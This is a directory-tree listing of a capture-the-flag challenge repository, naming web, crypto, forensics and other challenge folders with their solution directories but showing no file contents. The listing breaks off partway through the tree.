├── Challenges
├── BinaryCodes
│ ├── README.md
│ └── Web
│ │ ├── easy-lfi1
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── apache-config.conf
│ │ ├── app
│ │ │ ├── favicon.ico
│ │ │ ├── index.php
│ │ │ ├── pages
│ │ │ │ ├── contact-bedford.php
│ │ │ │ ├── page.php
│ │ │ │ ├── projects-bedford.php
│ │ │ │ └── read-me-bedford.php
│ │ │ ├── robots.txt
│ │ │ ├── somerandomtext
│ │ │ │ └── flag.php
│ │ │ ├── take-action-bedford.html
│ │ │ └── what-we-do-bedford.html
│ │ └── solution
│ │ │ └── README.md
│ │ ├── hard-ssrf1
│ │ ├── README.md
│ │ ├── cgi-edge
│ │ │ ├── Dockerfile
│ │ │ ├── LICENSE
│ │ │ ├── README.md
│ │ │ ├── apache2
│ │ │ │ ├── conf-available
│ │ │ │ │ └── serve-cgi-bin.conf
│ │ │ │ ├── mods-available
│ │ │ │ │ └── mime.conf
│ │ │ │ └── sites-available
│ │ │ │ │ └── 000-default.conf
│ │ │ ├── cgi-bin
│ │ │ │ └── index.py
│ │ │ ├── public_html
│ │ │ │ └── test.html
│ │ │ └── python-patch
│ │ │ │ ├── client.py
│ │ │ │ └── idna.py
│ │ ├── docker-compose.yml
│ │ ├── php-flag
│ │ │ ├── Dockerfile
│ │ │ ├── README.md
│ │ │ ├── apache
│ │ │ │ └── 000-default.conf
│ │ │ ├── data
│ │ │ │ ├── data
│ │ │ │ └── db
│ │ │ │ │ ├── board
│ │ │ │ │ ├── data
│ │ │ │ │ ├── flag
│ │ │ │ │ ├── log
│ │ │ │ │ └── users
│ │ │ └── start.sh
│ │ └── solution
│ │ │ ├── README.md
│ │ │ ├── git-relay-server.py
│ │ │ └── solver.py
│ │ ├── medium-race1
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── app
│ │ │ ├── connect.php
│ │ │ ├── css
│ │ │ │ ├── bootstrap.css
│ │ │ │ ├── bootstrap.min.css
│ │ │ │ ├── logo-nav.css
│ │ │ │ └── signin.css
│ │ │ ├── defcon
│ │ │ │ └── about.txt
│ │ │ ├── details.php
│ │ │ ├── flag.php
│ │ │ ├── fonts
│ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ ├── header.php
│ │ │ ├── js
│ │ │ │ ├── bootstrap.js
│ │ │ │ ├── bootstrap.min.js
│ │ │ │ └── jquery.js
│ │ │ ├── login.php
│ │ │ ├── logout.php
│ │ │ ├── register.php
│ │ │ ├── robots.txt
│ │ │ ├── setup.php
│ │ │ ├── test
│ │ │ │ ├── test.zip
│ │ │ │ ├── test1
│ │ │ │ └── test1.zip
│ │ │ ├── title_section.php
│ │ │ ├── upload.php
│ │ │ ├── v.conf
│ │ │ └── welcome.php
│ │ ├── docker-compose.yml
│ │ ├── etc
│ │ │ ├── apache
│ │ │ │ └── default
│ │ │ └── mysql
│ │ │ │ └── mysqld.conf
│ │ ├── scripts
│ │ │ └── init.sql
│ │ └── solution
│ │ │ ├── README.md
│ │ │ └── race.py
│ │ ├── medium-xss1
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── docker-compose.yml
│ │ ├── etc
│ │ │ ├── mysql
│ │ │ │ └── mysqld.conf
│ │ │ └── nginx
│ │ │ │ └── default
│ │ ├── init.sh
│ │ ├── nginx.conf
│ │ ├── nginx
│ │ │ ├── Dockerfile
│ │ │ └── sites-enabled
│ │ │ │ └── django_project
│ │ ├── scripts
│ │ │ ├── init.sql
│ │ │ ├── init_database.sh
│ │ │ └── run.sh
│ │ ├── solution
│ │ │ └── README.md
│ │ └── website
│ │ │ ├── .idea
│ │ │ ├── markdown-exported-files.xml
│ │ │ ├── markdown-navigator.xml
│ │ │ ├── markdown-navigator
│ │ │ │ └── profiles_settings.xml
│ │ │ ├── misc.xml
│ │ │ ├── modules.xml
│ │ │ ├── website.iml
│ │ │ └── workspace.xml
│ │ │ ├── Dockerfile
│ │ │ ├── app
│ │ │ ├── __init__.py
│ │ │ ├── admin.py
│ │ │ ├── app_settings.py
│ │ │ ├── apps.py
│ │ │ ├── forms.py
│ │ │ ├── management
│ │ │ │ ├── __init__.py
│ │ │ │ └── commands
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── check_profiles.py
│ │ │ │ │ └── initiate_database.py
│ │ │ ├── migrations
│ │ │ │ ├── 0001_initial.py
│ │ │ │ ├── 0002_user_description.py
│ │ │ │ ├── 0003_auto_20180120_0558.py
│ │ │ │ ├── 0004_auto_20180120_1806.py
│ │ │ │ └── __init__.py
│ │ │ ├── mixins.py
│ │ │ ├── models.py
│ │ │ ├── static
│ │ │ │ └── app
│ │ │ │ │ ├── css
│ │ │ │ │ ├── bootstrap-rtl.min.css
│ │ │ │ │ ├── bootstrap.min.css
│ │ │ │ │ └── small-business.css
│ │ │ │ │ ├── font-awesome
│ │ │ │ │ ├── css
│ │ │ │ │ │ ├── font-awesome.css
│ │ │ │ │ │ ├── font-awesome.css.orig
│ │ │ │ │ │ ├── font-awesome.min.css
│ │ │ │ │ │ └── font-awesome.min.css.orig
│ │ │ │ │ └── fonts
│ │ │ │ │ │ ├── fontawesome-webfont.eot_
│ │ │ │ │ │ ├── fontawesome-webfont.eot_v=4.3.0
│ │ │ │ │ │ ├── fontawesome-webfont.svg_v=4.3.0
│ │ │ │ │ │ ├── fontawesome-webfont.ttf_v=4.3.0
│ │ │ │ │ │ ├── fontawesome-webfont.woff2_v=4.3.0
│ │ │ │ │ │ └── fontawesome-webfont.woff_v=4.3.0
│ │ │ │ │ ├── fonts
│ │ │ │ │ ├── IRANSans-Bold-web.ttf
│ │ │ │ │ ├── IRANSans-Bold-web.woff
│ │ │ │ │ ├── IRANSans-Light-web.ttf
│ │ │ │ │ ├── IRANSans-Light-web.woff
│ │ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ │ ├── glyphicons-halflings-regular.eot_
│ │ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ │ │ ├── img
│ │ │ │ │ └── no-menn.png
│ │ │ │ │ └── js
│ │ │ │ │ ├── bootstrap.min.js
│ │ │ │ │ └── jquery.js
│ │ │ ├── templates
│ │ │ │ └── app
│ │ │ │ │ ├── base.html
│ │ │ │ │ ├── flag.html
│ │ │ │ │ ├── index.html
│ │ │ │ │ ├── login.html
│ │ │ │ │ ├── profile.html
│ │ │ │ │ ├── profile_edit.html
│ │ │ │ │ └── register.html
│ │ │ ├── templatetags
│ │ │ │ ├── __init__.py
│ │ │ │ └── app_tags.py
│ │ │ ├── tests.py
│ │ │ ├── urls.py
│ │ │ └── views.py
│ │ │ ├── avatar
│ │ │ └── test.jpg
│ │ │ ├── manage.py
│ │ │ ├── media
│ │ │ └── avatar
│ │ │ │ ├── empty.jpg
│ │ │ │ ├── test.gif
│ │ │ │ ├── test.js
│ │ │ │ ├── test.py
│ │ │ │ ├── test_0GWwxOT.gif
│ │ │ │ ├── test_27ocI4M.gif
│ │ │ │ ├── test_7zFsDhg.gif
│ │ │ │ ├── test_APyOfLm.gif
│ │ │ │ ├── test_B80PliW.gif
│ │ │ │ ├── test_BfFj8MW.gif
│ │ │ │ ├── test_NeifzZ3.gif
│ │ │ │ ├── test_Z8O46N0.gif
│ │ │ │ ├── test_c9sWenV.gif
│ │ │ │ ├── test_cNqcRyd.gif
│ │ │ │ ├── test_dnTjIRn.gif
│ │ │ │ ├── test_fjTRkgM.js
│ │ │ │ ├── test_lV0APfy.gif
│ │ │ │ ├── test_nAAq7iu.gif
│ │ │ │ ├── test_osvKkTn.gif
│ │ │ │ ├── test_pzwRb0m.gif
│ │ │ │ ├── test_vrikRjT.gif
│ │ │ │ └── test_yVcPZWz.gif
│ │ │ ├── package-lock.json
│ │ │ ├── requirements.txt
│ │ │ ├── static
│ │ │ ├── admin
│ │ │ │ ├── css
│ │ │ │ │ ├── base.css
│ │ │ │ │ ├── changelists.css
│ │ │ │ │ ├── dashboard.css
│ │ │ │ │ ├── fonts.css
│ │ │ │ │ ├── forms.css
│ │ │ │ │ ├── login.css
│ │ │ │ │ ├── rtl.css
│ │ │ │ │ └── widgets.css
│ │ │ │ ├── fonts
│ │ │ │ │ ├── LICENSE.txt
│ │ │ │ │ ├── README.txt
│ │ │ │ │ ├── Roboto-Bold-webfont.woff
│ │ │ │ │ ├── Roboto-Light-webfont.woff
│ │ │ │ │ └── Roboto-Regular-webfont.woff
│ │ │ │ ├── img
│ │ │ │ │ ├── LICENSE
│ │ │ │ │ ├── README.txt
│ │ │ │ │ ├── calendar-icons.svg
│ │ │ │ │ ├── gis
│ │ │ │ │ │ ├── move_vertex_off.svg
│ │ │ │ │ │ └── move_vertex_on.svg
│ │ │ │ │ ├── icon-addlink.svg
│ │ │ │ │ ├── icon-alert.svg
│ │ │ │ │ ├── icon-calendar.svg
│ │ │ │ │ ├── icon-changelink.svg
│ │ │ │ │ ├── icon-clock.svg
│ │ │ │ │ ├── icon-deletelink.svg
│ │ │ │ │ ├── icon-no.svg
│ │ │ │ │ ├── icon-unknown-alt.svg
│ │ │ │ │ ├── icon-unknown.svg
│ │ │ │ │ ├── icon-yes.svg
│ │ │ │ │ ├── inline-delete.svg
│ │ │ │ │ ├── search.svg
│ │ │ │ │ ├── selector-icons.svg
│ │ │ │ │ ├── sorting-icons.svg
│ │ │ │ │ ├── tooltag-add.svg
│ │ │ │ │ └── tooltag-arrowright.svg
│ │ │ │ └── js
│ │ │ │ │ ├── SelectBox.js
│ │ │ │ │ ├── SelectFilter2.js
│ │ │ │ │ ├── actions.js
│ │ │ │ │ ├── actions.min.js
│ │ │ │ │ ├── admin
│ │ │ │ │ ├── DateTimeShortcuts.js
│ │ │ │ │ └── RelatedObjectLookups.js
│ │ │ │ │ ├── calendar.js
│ │ │ │ │ ├── cancel.js
│ │ │ │ │ ├── change_form.js
│ │ │ │ │ ├── collapse.js
│ │ │ │ │ ├── collapse.min.js
│ │ │ │ │ ├── core.js
│ │ │ │ │ ├── inlines.js
│ │ │ │ │ ├── inlines.min.js
│ │ │ │ │ ├── jquery.init.js
│ │ │ │ │ ├── popup_response.js
│ │ │ │ │ ├── prepopulate.js
│ │ │ │ │ ├── prepopulate.min.js
│ │ │ │ │ ├── prepopulate_init.js
│ │ │ │ │ ├── timeparse.js
│ │ │ │ │ ├── urlify.js
│ │ │ │ │ └── vendor
│ │ │ │ │ ├── jquery
│ │ │ │ │ ├── LICENSE-JQUERY.txt
│ │ │ │ │ ├── jquery.js
│ │ │ │ │ └── jquery.min.js
│ │ │ │ │ └── xregexp
│ │ │ │ │ ├── LICENSE-XREGEXP.txt
│ │ │ │ │ ├── xregexp.js
│ │ │ │ │ └── xregexp.min.js
│ │ │ └── app
│ │ │ │ ├── css
│ │ │ │ ├── bootstrap-rtl.min.css
│ │ │ │ ├── bootstrap.min.css
│ │ │ │ └── small-business.css
│ │ │ │ ├── font-awesome
│ │ │ │ ├── css
│ │ │ │ │ ├── font-awesome.css
│ │ │ │ │ ├── font-awesome.css.orig
│ │ │ │ │ ├── font-awesome.min.css
│ │ │ │ │ └── font-awesome.min.css.orig
│ │ │ │ └── fonts
│ │ │ │ │ ├── fontawesome-webfont.eot_
│ │ │ │ │ ├── fontawesome-webfont.eot_v=4.3.0
│ │ │ │ │ ├── fontawesome-webfont.svg_v=4.3.0
│ │ │ │ │ ├── fontawesome-webfont.ttf_v=4.3.0
│ │ │ │ │ ├── fontawesome-webfont.woff2_v=4.3.0
│ │ │ │ │ └── fontawesome-webfont.woff_v=4.3.0
│ │ │ │ ├── fonts
│ │ │ │ ├── IRANSans-Bold-web.ttf
│ │ │ │ ├── IRANSans-Bold-web.woff
│ │ │ │ ├── IRANSans-Light-web.ttf
│ │ │ │ ├── IRANSans-Light-web.woff
│ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ ├── glyphicons-halflings-regular.eot_
│ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ │ ├── img
│ │ │ │ └── no-menn.png
│ │ │ │ └── js
│ │ │ │ ├── bootstrap.min.js
│ │ │ │ └── jquery.js
│ │ │ └── website
│ │ │ ├── __init__.py
│ │ │ ├── settings.py
│ │ │ ├── urls.py
│ │ │ └── wsgi.py
│ │ └── supereasy-phpbug1
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── app
│ │ ├── index.php
│ │ └── source.php
│ │ └── etc
│ │ └── apache
│ │ └── default
├── IRAN Cert
│ ├── 2015
│ │ ├── README.md
│ │ ├── accesslog
│ │ │ ├── README.md
│ │ │ └── access.log.zip
│ │ ├── helloadmin
│ │ │ ├── README.md
│ │ │ └── sourcefiles
│ │ │ │ ├── admin.php
│ │ │ │ ├── connect.php
│ │ │ │ ├── login.php
│ │ │ │ ├── logout.php
│ │ │ │ └── user.php
│ │ ├── hijacked
│ │ │ ├── README.md
│ │ │ ├── hijacked.pcap.pcapng
│ │ │ ├── images
│ │ │ │ ├── 1.png
│ │ │ │ ├── 10.png
│ │ │ │ ├── 11.png
│ │ │ │ ├── 12.png
│ │ │ │ ├── 2.png
│ │ │ │ ├── 3.png
│ │ │ │ ├── 4.png
│ │ │ │ ├── 5.png
│ │ │ │ ├── 6.png
│ │ │ │ ├── 7.png
│ │ │ │ ├── 8.png
│ │ │ │ └── 9.png
│ │ │ └── sourcefiles
│ │ │ │ ├── comments.php
│ │ │ │ ├── connect.php
│ │ │ │ ├── css
│ │ │ │ ├── bootstrap.css
│ │ │ │ ├── bootstrap.min.css
│ │ │ │ ├── logo-nav.css
│ │ │ │ └── signin.css
│ │ │ │ ├── ctfs.php
│ │ │ │ ├── defcon.php
│ │ │ │ ├── defcon
│ │ │ │ └── about.txt
│ │ │ │ ├── details.php
│ │ │ │ ├── fonts
│ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ │ ├── js
│ │ │ │ ├── bootstrap.js
│ │ │ │ ├── bootstrap.min.js
│ │ │ │ └── jquery.js
│ │ │ │ ├── login.php
│ │ │ │ ├── logout.php
│ │ │ │ ├── private
│ │ │ │ ├── check_session.php
│ │ │ │ └── create_session.php
│ │ │ │ ├── register.php
│ │ │ │ ├── robots.txt
│ │ │ │ ├── stuff
│ │ │ │ ├── header.php
│ │ │ │ ├── rand.php
│ │ │ │ └── salt.php
│ │ │ │ └── welcome.php
│ │ ├── maze
│ │ │ ├── README.md
│ │ │ └── sourcefiles
│ │ │ │ ├── manage.py
│ │ │ │ ├── maze
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── settings.py
│ │ │ │ ├── settings.pyc
│ │ │ │ ├── urls.py
│ │ │ │ ├── urls.pyc
│ │ │ │ ├── wsgi.py
│ │ │ │ └── wsgi.pyc
│ │ │ │ ├── maze_app
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── admin.py
│ │ │ │ ├── admin.pyc
│ │ │ │ ├── forms.py
│ │ │ │ ├── forms.pyc
│ │ │ │ ├── models.py
│ │ │ │ ├── models.pyc
│ │ │ │ ├── tests.py
│ │ │ │ ├── views.py
│ │ │ │ └── views.pyc
│ │ │ │ ├── static
│ │ │ │ ├── static_dirs
│ │ │ │ │ ├── css
│ │ │ │ │ │ ├── bootstrap.css
│ │ │ │ │ │ ├── bootstrap.min.css
│ │ │ │ │ │ └── logo-nav.css
│ │ │ │ │ ├── fonts
│ │ │ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ │ │ └── js
│ │ │ │ │ │ ├── bootstrap.js
│ │ │ │ │ │ ├── bootstrap.min.js
│ │ │ │ │ │ └── jquery.js
│ │ │ │ └── static_root
│ │ │ │ │ ├── admin
│ │ │ │ │ ├── css
│ │ │ │ │ │ ├── base.css
│ │ │ │ │ │ ├── changelists.css
│ │ │ │ │ │ ├── dashboard.css
│ │ │ │ │ │ ├── forms.css
│ │ │ │ │ │ ├── ie.css
│ │ │ │ │ │ ├── login.css
│ │ │ │ │ │ ├── rtl.css
│ │ │ │ │ │ └── widgets.css
│ │ │ │ │ ├── img
│ │ │ │ │ │ ├── changelist-bg.gif
│ │ │ │ │ │ ├── changelist-bg_rtl.gif
│ │ │ │ │ │ ├── default-bg-reverse.gif
│ │ │ │ │ │ ├── default-bg.gif
│ │ │ │ │ │ ├── deleted-overlay.gif
│ │ │ │ │ │ ├── gis
│ │ │ │ │ │ │ ├── move_vertex_off.png
│ │ │ │ │ │ │ └── move_vertex_on.png
│ │ │ │ │ │ ├── icon-no.gif
│ │ │ │ │ │ ├── icon-unknown.gif
│ │ │ │ │ │ ├── icon-yes.gif
│ │ │ │ │ │ ├── icon_addlink.gif
│ │ │ │ │ │ ├── icon_alert.gif
│ │ │ │ │ │ ├── icon_calendar.gif
│ │ │ │ │ │ ├── icon_changelink.gif
│ │ │ │ │ │ ├── icon_clock.gif
│ │ │ │ │ │ ├── icon_deletelink.gif
│ │ │ │ │ │ ├── icon_error.gif
│ │ │ │ │ │ ├── icon_searchbox.png
│ │ │ │ │ │ ├── icon_success.gif
│ │ │ │ │ │ ├── inline-delete-8bit.png
│ │ │ │ │ │ ├── inline-delete.png
│ │ │ │ │ │ ├── inline-restore-8bit.png
│ │ │ │ │ │ ├── inline-restore.png
│ │ │ │ │ │ ├── inline-splitter-bg.gif
│ │ │ │ │ │ ├── nav-bg-grabber.gif
│ │ │ │ │ │ ├── nav-bg-reverse.gif
│ │ │ │ │ │ ├── nav-bg-selected.gif
│ │ │ │ │ │ ├── nav-bg.gif
│ │ │ │ │ │ ├── selector-icons.gif
│ │ │ │ │ │ ├── selector-search.gif
│ │ │ │ │ │ ├── sorting-icons.gif
│ │ │ │ │ │ ├── tooltag-add.png
│ │ │ │ │ │ └── tooltag-arrowright.png
│ │ │ │ │ └── js
│ │ │ │ │ │ ├── LICENSE-JQUERY.txt
│ │ │ │ │ │ ├── SelectBox.js
│ │ │ │ │ │ ├── SelectFilter2.js
│ │ │ │ │ │ ├── actions.js
│ │ │ │ │ │ ├── actions.min.js
│ │ │ │ │ │ ├── admin
│ │ │ │ │ │ ├── DateTimeShortcuts.js
│ │ │ │ │ │ └── RelatedObjectLookups.js
│ │ │ │ │ │ ├── calendar.js
│ │ │ │ │ │ ├── collapse.js
│ │ │ │ │ │ ├── collapse.min.js
│ │ │ │ │ │ ├── core.js
│ │ │ │ │ │ ├── inlines.js
│ │ │ │ │ │ ├── inlines.min.js
│ │ │ │ │ │ ├── jquery.init.js
│ │ │ │ │ │ ├── jquery.js
│ │ │ │ │ │ ├── jquery.min.js
│ │ │ │ │ │ ├── prepopulate.js
│ │ │ │ │ │ ├── prepopulate.min.js
│ │ │ │ │ │ ├── related-widget-wrapper.js
│ │ │ │ │ │ ├── timeparse.js
│ │ │ │ │ │ └── urlify.js
│ │ │ │ │ ├── css
│ │ │ │ │ ├── bootstrap.css
│ │ │ │ │ ├── bootstrap.min.css
│ │ │ │ │ └── logo-nav.css
│ │ │ │ │ ├── fonts
│ │ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ │ │ └── js
│ │ │ │ │ ├── bootstrap.js
│ │ │ │ │ ├── bootstrap.min.js
│ │ │ │ │ └── jquery.js
│ │ │ │ └── templates
│ │ │ │ ├── admin.html
│ │ │ │ ├── base.html
│ │ │ │ ├── main.html
│ │ │ │ ├── session.html
│ │ │ │ └── subscribe.html
│ │ ├── scoreboard
│ │ ├── secretdoor
│ │ │ ├── README.md
│ │ │ └── sourcefiles
│ │ │ │ ├── connect.php
│ │ │ │ ├── contact.php
│ │ │ │ ├── css
│ │ │ │ ├── bootstrap.css
│ │ │ │ ├── bootstrap.min.css
│ │ │ │ ├── logo-nav.css
│ │ │ │ └── signin.css
│ │ │ │ ├── fonts
│ │ │ │ ├── glyphicons-halflings-regular.eot
│ │ │ │ ├── glyphicons-halflings-regular.svg
│ │ │ │ ├── glyphicons-halflings-regular.ttf
│ │ │ │ ├── glyphicons-halflings-regular.woff
│ │ │ │ └── glyphicons-halflings-regular.woff2
│ │ │ │ ├── icon.gif
│ │ │ │ ├── js
│ │ │ │ ├── bootstrap.js
│ │ │ │ ├── bootstrap.min.js
│ │ │ │ └── jquery.js
│ │ │ │ ├── login.php
│ │ │ │ ├── logout.php
│ │ │ │ ├── pics
│ │ │ │ ├── network_security_technology_slide2.jpg
│ │ │ │ ├── network_security_technology_slide3.jpg
│ │ │ │ ├── network_security_technology_slide4.jpg
│ │ │ │ ├── network_security_technology_slide5.jpg
│ │ │ │ ├── network_security_technology_slide6.jpg
│ │ │ │ └── network_security_technology_slide7.jpg
│ │ │ │ ├── products
│ │ │ │ └── index.php
│ │ │ │ ├── profile.php
│ │ │ │ ├── search.php
│ │ │ │ ├── simple-php-captcha-master
│ │ │ │ ├── .gitignore
│ │ │ │ ├── backgrounds
│ │ │ │ │ ├── 45-degree-fabric.png
│ │ │ │ │ ├── cloth-alike.png
│ │ │ │ │ ├── grey-sandbag.png
│ │ │ │ │ ├── kinda-jean.png
│ │ │ │ │ ├── polyester-lite.png
│ │ │ │ │ ├── stitched-wool.png
│ │ │ │ │ ├── white-carbon.png
│ │ │ │ │ └── white-wave.png
│ │ │ │ ├── fonts
│ │ │ │ │ └── times_new_yorker.ttf
│ │ │ │ ├── index.php
│ │ │ │ └── simple-php-captcha.php
│ │ │ │ └── welcome.php
│ │ └── simpleweb
│ │ │ ├── README.md
│ │ │ └── sourcefiles
│ │ │ ├── css.html
│ │ │ ├── css
│ │ │ ├── bootstrap.css
│ │ │ ├── bootstrap.min.css
│ │ │ ├── logo-nav.css
│ │ │ └── signin.css
│ │ │ ├── html.html
│ │ │ ├── index.html
│ │ │ ├── info
│ │ │ └── javascript.html
│ ├── 2016
│ │ ├── 0- FirstTimeCTFers
│ │ │ ├── Crypto
│ │ │ │ ├── 10pt- different bases
│ │ │ │ │ ├── cipher.txt
│ │ │ │ │ ├── different bases
│ │ │ │ │ │ └── info.json
│ │ │ │ │ └── info.txt
│ │ │ │ └── 5pt- change your position
│ │ │ │ │ ├── change your position
│ │ │ │ │ └── info.json
│ │ │ │ │ ├── cipher.txt
│ │ │ │ │ ├── info.json
│ │ │ │ │ └── solution.txt
│ │ │ ├── Misc
│ │ │ │ ├── 5pt- use your brain
│ │ │ │ │ ├── data
│ │ │ │ │ ├── info.txt
│ │ │ │ │ └── use your brain
│ │ │ │ │ │ ├── data
│ │ │ │ │ │ └── info.json
│ │ │ │ └── 5pt- what is your dna
│ │ │ │ │ ├── cipher.txt
│ │ │ │ │ ├── info.txt
│ │ │ │ │ └── what is your dna
│ │ │ │ │ ├── cipher.txt
│ │ │ │ │ └── info.json
│ │ │ ├── Reverse
│ │ │ │ └── 5pt- Hardcoded flag
│ │ │ │ │ ├── hardcoded flag
│ │ │ │ │ ├── info.json
│ │ │ │ │ └── main
│ │ │ │ │ ├── info.txt
│ │ │ │ │ ├── main
│ │ │ │ │ └── main.c
│ │ │ ├── Steg
│ │ │ │ ├── 10pt- easy messaging
│ │ │ │ │ ├── cipher.txt
│ │ │ │ │ ├── easy messaging
│ │ │ │ │ │ ├── cipher.txt
│ │ │ │ │ │ └── info.json
│ │ │ │ │ └── info.txt
│ │ │ │ └── 5pt- hidden string
│ │ │ │ │ ├── hidden string
│ │ │ │ │ ├── info.json
│ │ │ │ │ └── nature.jpg
│ │ │ │ │ ├── info.txt
│ │ │ │ │ └── nature.jpg
│ │ │ └── Web
│ │ │ │ └── 5pt - distinct authentication
│ │ │ │ ├── distinct authentication
│ │ │ │ └── info.json
│ │ │ │ ├── info.txt
│ │ │ │ └── main.php
│ │ ├── 1- Easy
│ │ │ ├── Crypto
│ │ │ │ ├── 10-40pt- crypto engine
│ │ │ │ │ ├── Challenge
│ │ │ │ │ │ ├── ascii-art
│ │ │ │ │ │ │ ├── ascii-art.zip
│ │ │ │ │ │ │ ├── ascii-art
│ │ │ │ │ │ │ │ ├── cipher.txt
│ │ │ │ │ │ │ │ └── info.json
│ │ │ │ │ │ │ ├── cipher.txt
│ │ │ │ │ │ │ └── flag.txt
│ │ │ │ │ │ └── vigenere
│ │ │ │ │ │ │ ├── cipher.txt
│ │ │ │ │ │ │ ├── easy cipher.zip
│ │ │ │ │ │ │ ├── easy cipher
│ │ │ │ │ │ │ ├── cipher.txt
│ │ │ │ │ │ │ └── info.json
│ │ │ │ │ │ │ └── flag.txt
│ │ │ │ │ └── crypto engine
│ │ │ │ │ │ ├── .idea
│ │ │ │ │ │ ├── .name
│ │ │ │ │ │ ├── crypt_server.iml
│ │ │ │ │ │ ├── encodings.xml
│ │ │ │ │ │ ├── misc.xml
│ │ │ │ │ │ ├── modules.xml
│ │ │ │ │ │ ├── scopes
│ │ │ │ │ │ │ └── scope_settings.xml
│ │ │ │ │ │ ├── vcs.xml
│ │ │ │ │ │ └── workspace.xml
│ │ │ │ │ │ ├── ascii_art_40pt
│ │ │ │ │ │ ├── __init__.py
│ │ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ │ ├── admin.py
│ │ │ │ │ │ ├── admin.pyc
│ │ │ │ │ │ ├── migrations
│ │ │ │ │ │ │ ├── __init__.py
│ │ │ │ │ │ │ └── __init__.pyc
│ │ │ │ │ │ ├── models.py
│ │ │ │ │ │ ├── models.pyc
│ │ │ │ │ │ ├── tests.py
│ │ │ │ │ │ ├── views.py
│ │ │ │ │ │ └── views.pyc
│ │ │ │ │ │ ├── crypt_server
│ │ │ │ │ │ ├── __init__.py
│ │ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ │ ├── settings.py
│ │ │ │ │ │ ├── settings.pyc
│ │ │ │ │ │ ├── urls.py
│ │ │ │ │ │ ├── urls.pyc
│ │ │ │ │ │ ├── wsgi.py
│ │ │ │ │ │ └── wsgi.pyc
│ │ │ │ │ │ ├── db.sqlite3
│ │ │ │ │ │ ├── manage.py
│ │ │ │ │ │ ├── templates
│ │ │ │ │ │ ├── ascii_art_index.html
│ │ │ │ │ │ └── vigenere_index.html
│ │ │ │ │ │ └── vigenere_10pt
│ │ │ │ │ │ ├── __init__.py
│ │ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ │ ├── admin.py
│ │ │ │ │ │ ├── migrations
│ │ │ │ │ │ └── __init__.py
│ │ │ │ │ │ ├── models.py
│ │ │ │ │ │ ├── tests.py
│ │ │ │ │ │ ├── views.py
│ │ │ │ │ │ └── views.pyc
│ │ │ │ ├── 30pt- rare encryption
│ │ │ │ │ ├── cipher.txt
│ │ │ │ │ ├── info.txt
│ │ │ │ │ └── rare encryption
│ │ │ │ │ │ ├── cipher.txt
│ │ │ │ │ │ └── info.json
│ │ │ │ └── 40pt- rsa1
│ │ │ │ │ ├── info.txt
│ │ │ │ │ ├── rsa1
│ │ │ │ │ ├── data.secret
│ │ │ │ │ ├── info.json
│ │ │ │ │ └── rsa.dat
│ │ │ │ │ └── solve.py
│ │ │ ├── Forensics
│ │ │ │ ├── 20pt- curroption
│ │ │ │ │ ├── corroption
│ │ │ │ │ │ ├── file
│ │ │ │ │ │ └── info.json
│ │ │ │ │ ├── file.jpe
│ │ │ │ │ ├── file.jpg
│ │ │ │ │ └── info.txt
│ │ │ │ └── 40pt- attack1
│ │ │ │ │ ├── arp-poison
│ │ │ │ │ ├── arp-poison.c
│ │ │ │ │ ├── arp-scan.py
│ │ │ │ │ ├── arp.py
│ │ │ │ │ ├── attack.pcapng
│ │ │ │ │ ├── attack1
│ │ │ │ │ ├── attack.pcapng
│ │ │ │ │ └── info.json
│ │ │ │ │ └── info.txt
│ │ │ ├── PPC & Web
│ │ │ │ └── project
│ │ │ │ │ ├── .idea
│ │ │ │ │ ├── .name
│ │ │ │ │ ├── dataSources.ids
│ │ │ │ │ ├── dataSources.local.xml
│ │ │ │ │ ├── dataSources.xml
│ │ │ │ │ ├── encodings.xml
│ │ │ │ │ ├── misc.xml
│ │ │ │ │ ├── modules.xml
│ │ │ │ │ ├── project.iml
│ │ │ │ │ ├── scopes
│ │ │ │ │ │ └── scope_settings.xml
│ │ │ │ │ ├── vcs.xml
│ │ │ │ │ └── workspace.xml
│ │ │ │ │ ├── app
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── __init__.pyc
│ │ │ │ │ ├── admin.py
│ │ │ │ │ ├── admin.pyc
│ │ │ │ │ ├── forms.py
│ │ │ │ │ ├── forms.pyc
│ │ │ │ │ ├── models.py
│ │ │ │ │ ├── models.pyc
│ │ │ │ │ ├── tests.py
│ │ │ │ │ ├── views.py
│ │ │ │ │ └── views.pyc
│ │ │ │ │ ├── challenge_easy_math_40pt
